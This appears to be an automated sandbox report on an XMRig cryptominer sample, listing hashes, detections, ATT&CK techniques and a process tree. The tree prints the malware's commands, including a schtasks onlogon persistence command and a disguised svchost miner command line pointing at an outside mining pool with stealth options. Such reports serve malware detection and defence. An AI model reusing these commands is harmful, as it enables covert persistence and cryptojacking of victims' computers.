xmrig | 9455317c587d80f524eaf40bc0bf1c0a374ced979222e91f22a20aae94a44c28

Analysis

max time kernel
53s
max time network
148s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
10/01/2024, 03:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f520eb5804ae1b26974fabee5403470f1aa97b837fdd9856b3a5f252199a07f4.exe
Size

30.0MB
MD5

a56e4ddc5dd0e6f0fd17011334868e43
SHA1

a423f61c97f26b09aa85d96935d226f8df6e5d02
SHA256

f520eb5804ae1b26974fabee5403470f1aa97b837fdd9856b3a5f252199a07f4
SHA512

18f5bac7142be9345275bc24bb14e2501465b29045d51f86d5e8ca33e614132088a4b0486392c21354eef9f9d99780e1ce237a821a466b3136083dbb0e40b8f8
SSDEEP

786432:owtqBfF8Xk67VcgNuSQLCpo/26wLRf0dnlemSGZRVU:owtqDWkccNSjo/w50nemPXVU

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 19 IoCs

miner

resource	yara_rule
behavioral1/memory/1908-28-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1908-30-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1908-29-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1908-31-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1908-32-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1908-33-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1908-34-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1908-35-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1908-36-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1908-39-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1908-42-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1908-44-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1908-49-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1908-48-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1908-46-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1908-47-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1908-50-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1908-51-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1908-52-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig

Executes dropped EXE 1 IoCs

pid	Process
2592	services64.exe

Loads dropped DLL 2 IoCs

pid	Process
2736	cmd.exe
2736	cmd.exe

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2956	schtasks.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2880	conhost.exe
2888	conhost.exe
2888	conhost.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2880	conhost.exe
Token: SeDebugPrivilege	2888	conhost.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 2404 wrote to memory of 2880	2404	f520eb5804ae1b26974fabee5403470f1aa97b837fdd9856b3a5f252199a07f4.exe	28
PID 2404 wrote to memory of 2880	2404	f520eb5804ae1b26974fabee5403470f1aa97b837fdd9856b3a5f252199a07f4.exe	28
PID 2404 wrote to memory of 2880	2404	f520eb5804ae1b26974fabee5403470f1aa97b837fdd9856b3a5f252199a07f4.exe	28
PID 2404 wrote to memory of 2880	2404	f520eb5804ae1b26974fabee5403470f1aa97b837fdd9856b3a5f252199a07f4.exe	28
PID 2880 wrote to memory of 2596	2880	conhost.exe	32
PID 2880 wrote to memory of 2596	2880	conhost.exe	32
PID 2880 wrote to memory of 2596	2880	conhost.exe	32
PID 2596 wrote to memory of 2956	2596	cmd.exe	31
PID 2596 wrote to memory of 2956	2596	cmd.exe	31
PID 2596 wrote to memory of 2956	2596	cmd.exe	31
PID 2880 wrote to memory of 2736	2880	conhost.exe	33
PID 2880 wrote to memory of 2736	2880	conhost.exe	33
PID 2880 wrote to memory of 2736	2880	conhost.exe	33
PID 2736 wrote to memory of 2592	2736	cmd.exe	37
PID 2736 wrote to memory of 2592	2736	cmd.exe	37
PID 2736 wrote to memory of 2592	2736	cmd.exe	37
PID 2592 wrote to memory of 2888	2592	services64.exe	38
PID 2592 wrote to memory of 2888	2592	services64.exe	38
PID 2592 wrote to memory of 2888	2592	services64.exe	38
PID 2592 wrote to memory of 2888	2592	services64.exe	38

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\f520eb5804ae1b26974fabee5403470f1aa97b837fdd9856b3a5f252199a07f4.exe
"C:\Users\Admin\AppData\Local\Temp\f520eb5804ae1b26974fabee5403470f1aa97b837fdd9856b3a5f252199a07f4.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2404
- C:\Windows\System32\conhost.exe
  "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\f520eb5804ae1b26974fabee5403470f1aa97b837fdd9856b3a5f252199a07f4.exe"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2880
- - C:\Windows\System32\cmd.exe
    "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2596
- - C:\Windows\System32\cmd.exe
    "cmd" cmd /c "C:\Users\Admin\AppData\Local\Temp\services64.exe"
    3⤵
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:2736
  - - C:\Users\Admin\AppData\Local\Temp\services64.exe
      C:\Users\Admin\AppData\Local\Temp\services64.exe
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:2592
    - - C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\services64.exe"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2888
      - C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        6⤵
        
        PID:1028
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "/sihost64"
        7⤵
        
        PID:2840
      - C:\Windows\System32\svchost.exe
        
        C:\Windows/System32\svchost.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=7173839 --pass=calestial --cpu-max-threads-hint=20 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=3 --cinit-idle-cpu=80 --cinit-stealth
        6⤵
        
        PID:1908

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"
1⤵
- Creates scheduled task(s)
PID:2956

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\services64.exe

Filesize
162KB

MD5
cebf67f9a6c59a6abd69446adca52c84

SHA1
3a8452ecd36d828ef81b097bf0ad9c55bc5dc793

SHA256
8051bba6c2269f4f285796c690d4d64f84277701c938a2e6c5f70c6a7bb1c4be

SHA512
84d42ffa7c2d64e822cbd8d31b7758928b28000b0ada764cd040a93ca5d4f9b068ff8afd4f21370269025591e90e4e8c032e9a1144621b0c9b139f1146762001

Download Submit
C:\Users\Admin\AppData\Local\Temp\services64.exe

Filesize
117KB

MD5
31e33d0e793263db878ae84dec80d48d

SHA1
f8d12c0b69ab2df13169a8adf07d27d244f08644

SHA256
bad40f66a6eae77d8358d5bd2e46ea74813a43badc85212b11ad07529aefadc5

SHA512
bd591b71d79efb5f26811df2aae5050f11c9d28b078b9f745dfdeb7b2ce9fa15f837571cf38b9d6dc3506d6fb29146887383972e9097d987d3eb4ef38030b9f3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

Filesize
30KB

MD5
cff3028b0fcdeef2c86ed9edcb1f453b

SHA1
27c06436272d6166bf52439820285a633e0d45f9

SHA256
2b9135fad6a9ae50953d4794687ffe1c96827f45e8fd9146b6a3f5a70f4a946e

SHA512
673f4f8f9997f760277f8cbe46ff3623cd93e76bede8b701befcfc2fb68a92ea1d9cb9372a3f57f9ea1d428774c3b433fb5651ff8dce3345b89aacf2b3a1fa8a

Download Submit
\Users\Admin\AppData\Local\Temp\services64.exe

Filesize
89KB

MD5
7c320db058839435532039bdac6a3bee

SHA1
8edc7862a7f217673bd7240417fc44543deda1f1

SHA256
76ff4a29f67b6f62ea8d4030fcc5c600a55fb95508020726edc68df83c816a4b

SHA512
05d315c79882d5cdd7eb6c2b2b9defa303334f3fea19847d3350768d895fdb4c2e6153fdd71b5e7a7e96798c908c3cf8955fbd4aa89e7c37a981f5ec9b2c2abe

Download Submit
\Users\Admin\AppData\Local\Temp\services64.exe

Filesize
223KB

MD5
1a3b82b28b81bc84d40d5ad08edd2e9a

SHA1
930235978ddaa9e85bf38ced415f843af0c58aa4

SHA256
effc1c31b9e20cc236b534f972b76260b2284b64e22f79168238af36cf87610e

SHA512
2af99d0e18adbccd3b8c1d5cdff3a0e8fffe174ad23fa0639770a621f2a44a893967d82520105950d60e286c0249a4aba3971484d35d4e56d070f88002910c2d

Download Submit
memory/1908-50-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1908-31-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1908-60-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1908-52-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1908-51-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1908-47-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1908-46-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1908-48-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1908-49-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1908-25-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1908-26-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1908-27-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1908-28-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1908-43-0x0000000000070000-0x0000000000090000-memory.dmp

Filesize
128KB

Download
memory/1908-29-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1908-42-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1908-32-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1908-33-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1908-34-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1908-35-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1908-36-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1908-37-0x000007FFFFFD4000-0x000007FFFFFD5000-memory.dmp

Filesize
4KB

Download
memory/1908-44-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1908-39-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1908-30-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/2840-59-0x000000001AE30000-0x000000001AEB0000-memory.dmp

Filesize
512KB

Download
memory/2840-57-0x000000001AE30000-0x000000001AEB0000-memory.dmp

Filesize
512KB

Download
memory/2840-63-0x000000001AE30000-0x000000001AEB0000-memory.dmp

Filesize
512KB

Download
memory/2840-62-0x000000001AE30000-0x000000001AEB0000-memory.dmp

Filesize
512KB

Download
memory/2840-61-0x000007FEF59C0000-0x000007FEF63AC000-memory.dmp

Filesize
9.9MB

Download
memory/2840-56-0x000000001AE30000-0x000000001AEB0000-memory.dmp

Filesize
512KB

Download
memory/2840-58-0x000000001AE30000-0x000000001AEB0000-memory.dmp

Filesize
512KB

Download
memory/2840-55-0x00000000001C0000-0x00000000001C6000-memory.dmp

Filesize
24KB

Download
memory/2840-54-0x000007FEF59C0000-0x000007FEF63AC000-memory.dmp

Filesize
9.9MB

Download
memory/2840-53-0x0000000000060000-0x0000000000066000-memory.dmp

Filesize
24KB

Download
memory/2880-2-0x000000001E9F0000-0x000000001EA70000-memory.dmp

Filesize
512KB

Download
memory/2880-6-0x000007FEF59C0000-0x000007FEF63AC000-memory.dmp

Filesize
9.9MB

Download
memory/2880-3-0x0000000020830000-0x00000000225EE000-memory.dmp

Filesize
29.7MB

Download
memory/2880-0-0x00000000000E0000-0x0000000001E9E000-memory.dmp

Filesize
29.7MB

Download
memory/2880-10-0x000007FEF59C0000-0x000007FEF63AC000-memory.dmp

Filesize
9.9MB

Download
memory/2880-4-0x000000001E9F0000-0x000000001EA70000-memory.dmp

Filesize
512KB

Download
memory/2880-1-0x000007FEF59C0000-0x000007FEF63AC000-memory.dmp

Filesize
9.9MB

Download
memory/2888-45-0x000007FEF4FD0000-0x000007FEF59BC000-memory.dmp

Filesize
9.9MB

Download
memory/2888-14-0x000007FEF4FD0000-0x000007FEF59BC000-memory.dmp

Filesize
9.9MB

Download
memory/2888-15-0x0000000005AD0000-0x0000000005B50000-memory.dmp

Filesize
512KB

Download